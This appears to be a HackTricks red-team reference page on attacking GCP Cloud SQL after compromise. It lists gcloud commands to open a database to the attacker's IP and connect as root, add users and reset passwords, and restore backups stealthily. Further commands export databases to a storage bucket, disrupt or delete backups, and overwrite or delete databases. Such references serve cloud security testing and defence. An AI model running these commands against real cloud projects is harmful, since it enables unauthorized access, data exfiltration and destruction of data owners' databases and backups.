{% hint style="success" %}
Learn & practice AWS Hacking:.png)
HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: .png)
HackTricks Training GCP Red Team Expert (GRTE).png)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
For more information about Cloud SQL check:
{% content-ref url="../gcp-services/gcp-cloud-sql-enum.md" %} gcp-cloud-sql-enum.md {% endcontent-ref %}
To connect to the databases you just need access to the database port and know the username and password, there isn't any IAM requirements. So, an easy way to get access, supposing that the database has a public IP address, is to update the allowed networks and allow your own IP address to access it.
# Use --assign-ip to make the database get a public IPv4
gcloud sql instances patch $INSTANCE_NAME \
--authorized-networks "$(curl ifconfig.me)" \
--assign-ip \
--quiet
mysql -h <ip_db> # If mysql
# With cloudsql.instances.get you can use gcloud directly
gcloud sql connect mysql --user=root --quietIt's also possible to use --no-backup to disrupt the backups of the database.
As these are the requirements I'm not completely sure what are the permissions cloudsql.instances.connect and cloudsql.instances.login for. If you know it send a PR!
Get a list of all the users of the database:
gcloud sql users list --instance <intance-name>This permission allows to create a new user inside the database:
gcloud sql users create <username> --instance <instance-name> --password <password>This permission allows to update user inside the database. For example, you could change its password:
{% code overflow="wrap" %}
gcloud sql users set-password <username> --instance <instance-name> --password <password>{% endcode %}
Backups might contain old sensitive information, so it's interesting to check them.
Restore a backup inside a database:
gcloud sql backups restore <backup-id> --restore-instance <instance-id>To do it in a more stealth way it's recommended to create a new SQL instance and recover the data there instead of in the currently running databases.
This permission allow to delete backups:
gcloud sql backups delete <backup-id> --instance <instance-id>Export a database to a Cloud Storage Bucket so you can access it from there:
# Export sql format, it could also be csv and bak
gcloud sql export sql <instance-id> <gs://bucketName/fileName> --database <db>Import a database (overwrite) from a Cloud Storage Bucket:
# Import format SQL, you could also import formats bak and csv
gcloud sql import sql <instance-id> <gs://bucketName/fileName>Delete a database from the db instance:
gcloud sql databases delete <db-name> --instance <instance-id>{% hint style="success" %}
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.